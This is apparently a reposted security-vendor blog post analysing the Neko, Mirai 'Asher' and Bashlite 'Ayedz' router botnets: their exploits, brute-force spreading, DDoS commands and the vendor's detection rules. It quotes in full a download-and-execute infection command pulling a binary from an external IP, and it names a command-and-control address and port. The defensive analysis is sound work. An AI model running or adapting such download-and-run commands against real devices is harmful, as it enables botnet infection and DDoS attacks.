By Augusto Remillano II and Jakub Urbanec
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:
“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”
Our research indicates that this botnet has versions for various processor architectures.
Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands: it can execute shell commands as well as launch user datagram protocol or UDP and UPD-HEX flood attacks, inundating a router’s ability to properly process and respond to information.
It is also capable of killing processes (the “killer” function is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.
Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:
Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specific exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.
Figure 1. Neko botnet code showing how it scans for Africo devices
On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the file is now UPX-packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked.
Figure 2. UPX-packed Neko botnet code with an altered magic number
We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure as the Africo scan.
Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200
The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (2016-6277).
Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV-DVR exploits and Netgear R7000 and R6400 routers
This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.
Figure 6. Neko botnet code showing how it scans for “awsec”
In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g”. however, based on our analysis, both commands are unable to successfully exploit any vulnerability. “Cisco” appears to be attempting to use CVE-2018-15379, wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permission, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited.
Figure 7. Neko botnet code showing how it scans for “cisco”
Meanwhile, the “wap54g” payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.
Figure 8. Neko botnet code showing how it scans for “wap54g”
On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices with a BusyBox, which is a software suite for devices with limited resources. It first checks for BusyBox presence by executing the “/bin/busybox {any string}” command. If the device’s system responds with “{any string} applet not found,” the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”
Figure 9. Screenshot showing the command that checks for the presence of a BusyBox
The “Asher” variant can infiltrate routers by brute-forcing its way in using the following telnet login credentials:
We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:
Figure 10. The exploits Asher botnet scans for
Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability
Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361
Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562
On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time, a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s file name. Upon execution, Ayedz will send the following information about the infected device back to the host IP address 167[.]71[.]7[.]231 via port 46216:
Figure 14. The commands used by Bashlite variant Ayedz to send information back to its host
Analysis of this Ayedz sample revealed that it is capable of running several backdoor commands for launching DDoS attacks. We also observed that Ayedz features several attack/flood options as well as other commands to its operators, such as:
Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats like Mirai, Neko, and Bashlite:
Trend Micro Smart Home Network protects customers from the aforementioned exploits through these rules:
1133255 | WEB Remote Command Execution in XML -1 |
1059669 | WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID-37690) |
1134287 | WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215) |
1134610 1134611 1134891 1134892 | WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561) |
1058632 1054456 1054457 | EXPLOIT Linksys E-series Unauthenticated Remote Code Execution Exploit (EDB-31683) WEB Linksys Unauthenticated Remote Code Execution -1 (OSVDB-103321) WEB Linksys Unauthenticated Remote Code Execution -2 (OSVDB-103321) |
1133498 | WEB Remote Command Execution via Shell Script -1.u |
1135215 | WEB ThinkPHP Remote Code Execution |
1134286 | WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361) |
1133498 | WEB Remote Command Execution via Shell Script -1.u |
1134286 | WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361) |
1134610 1134611 1134891 1134892 | WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561) WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561) |
Trend Micro
Neko
Payload | Rule |
Netgear | Official Rule 2547: NETGEAR DGN1000/DGN2200 Remote Code Execution – HTTP (Request) |
NetgearR7064 | Official Rule 4103: Daemon DD-WRT Unauthenticated RCE Exploit – HTTP (Request) |
Crossweb | Beta Rule 3268: CCTV-DVR Remote Code Execution – HTTP (Request) |
Official Rule 2485: CCTV-DVR Remote Code Execution – HTTP (Request) | |
Cisco | Official Rule 2452: Wget Commandline Injection |
Beta Rule 3269: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request) | |
Official Rule 4168: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request) | |
Awsec/Vacron | Official Rule 2543: VACRON Remote Code Execution Exploit- HTTP (Request) |
WAP54G | Beta Rule 3270: Linksys Remote Debug Root Shell- HTTP (Request) |
Official Rule 4169: Linksys Remote Debug Root Shell- HTTP (Request) |
Asher
REALTEK | Rule 2575: Command Injection via UPnP SOAP Interface – HTTP (Request) |
JAWS | Rule 2544: JAWS Remote Code Execution Exploit – HTTP (Request), Rule 2639: CVE-2018-10562 – GPON Remote Code Execution – HTTP (Request) |
Ayedz
Linux | Beta Rule 3272: BASHLITE – TCP (Request) – Beta Official Rule 4180: BASHLITE – TCP (Request) |
The indicators of compromise (IoCs) are listed in an appendix.
The post Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices appeared first on .
The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was… Read More
For nearly a dozen years, residents of South Carolina have been kept in the dark… Read More
The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings… Read More
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said today it is investigating a breach… Read More
On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead.… Read More
If only Patch Tuesdays came around infrequently — like total solar eclipse rare — instead… Read More